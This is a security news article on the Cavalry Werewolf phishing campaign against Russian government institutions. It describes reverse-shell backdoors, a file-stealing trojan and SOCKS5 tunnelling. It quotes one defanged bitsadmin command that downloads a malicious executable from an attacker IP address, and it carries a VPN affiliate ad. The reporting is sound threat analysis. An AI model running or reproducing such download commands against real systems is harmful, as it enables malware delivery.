In July 2025, a sophisticated hacking group known as Cavalry Werewolf executed a targeted campaign against Russian government institutions, compromising critical infrastructure through coordinated phishing attacks.
See also: October 2025: Increase in phishing and ransomware attacks

The discovery of this campaign reveals a complex chain of attacks designed to establish persistent network access, extract sensitive data, and maintain long-term control over compromised systems.
Dr.Web security analysts identified the group after they were contacted by a targeted government organization that detected suspicious email traffic originating from internal corporate accounts, indicating unauthorized network access.
The investigation uncovered multiple previously unknown malware variants deployed in a multi-layered infection process. The attackers demonstrated sophisticated operational security practices by using open source tools, implementing encryption, and establishing a command and control infrastructure across multiple servers.
Their arsenal includes various reverse shell backdoors, data-stealing trojans, and process injection techniques that allow remote command execution without triggering traditional security mechanisms.
Dr.Web security researchers noted that this campaign represents a significant escalation in sophistication, with the team continuously expanding its toolkit to adapt to different target environments. The attack methodology focuses on deploying backdoors that establish remote shell access, allowing attackers to execute commands and maintain persistence within compromised networks.
This approach provides the flexibility to deploy additional stages of malware based on identification findings within each target organization. Cavalry Werewolf launches attacks via phishing emails containing malicious attachments that pretend to be official government documents.
See also: New Phishing Attack Exploits Cloudflare and ZenDesk Pages

The primary infection stage, identified as BackDoor.ShellNET.1, arrives in password-protected archive files with deceptive file names such as administrative reports and internal communications. Once executed, this reverse shell backdoor based on the open source Reverse-Shell-CS allows attackers to remotely connect to infected systems and execute arbitrary commands. After the initial compromise, attackers leverage the legitimate Windows tool, Bitsadmin, to download additional malicious payloads via remote command execution.
This represents a classic living-off-the-land where legitimate system tools become vehicles for malware development. The command syntax follows this pattern: bitsadmin /transfer www /download hxxp[:]//195[.]2.79[.]245/winpot.exe C:\users\public\downloads\winpot.exe.
This particular sequence shows how attackers maintain operational security using standard Windows mechanisms that usually look legitimate in network logs. The next stages of infection introduce file-stealing trojans such as Trojan.FileSpyNET.5, capable of exporting documents in common formats, including Word files, Excel spreadsheets, PDFs, and image files.
The attackers then deploy BackDoor.Tunnel.41, based on the open source ReverseSocks5, which creates SOCKS5 tunnels for silent remote access and command execution. This layered approach allows the team to maintain multiple access points within the compromised infrastructure, ensuring persistence even if individual backdoors are detected and removed.
The technical sophistication displayed throughout the campaign highlights the evolving threat landscape facing government organizations.
See also: Anatomy of a phishing email: How to spot a well-crafted trap
🔒 Protect your privacy with Proton VPN
Swiss VPN from the creators of Proton Mail — strict no-logs policy, strong encryption, and built-in NetShield that blocks ads, trackers, & malware.
- ✔ No-logs, based in Switzerland (except 14-Eyes)
- ✔ NetShield: blocks ads, trackers & malicious domains
- ✔ Covers all devices — free version available
The link is an affiliate link — SecNews may receive a commission at no additional cost to you. It does not affect the independence of our article writing.

Combining legitimate tools, open source frameworks, and custom malware modifications, Cavalry Werewolf demonstrates a mature operational capability designed to evade detection while maintaining flexible command and control structures appropriate for different target environments.
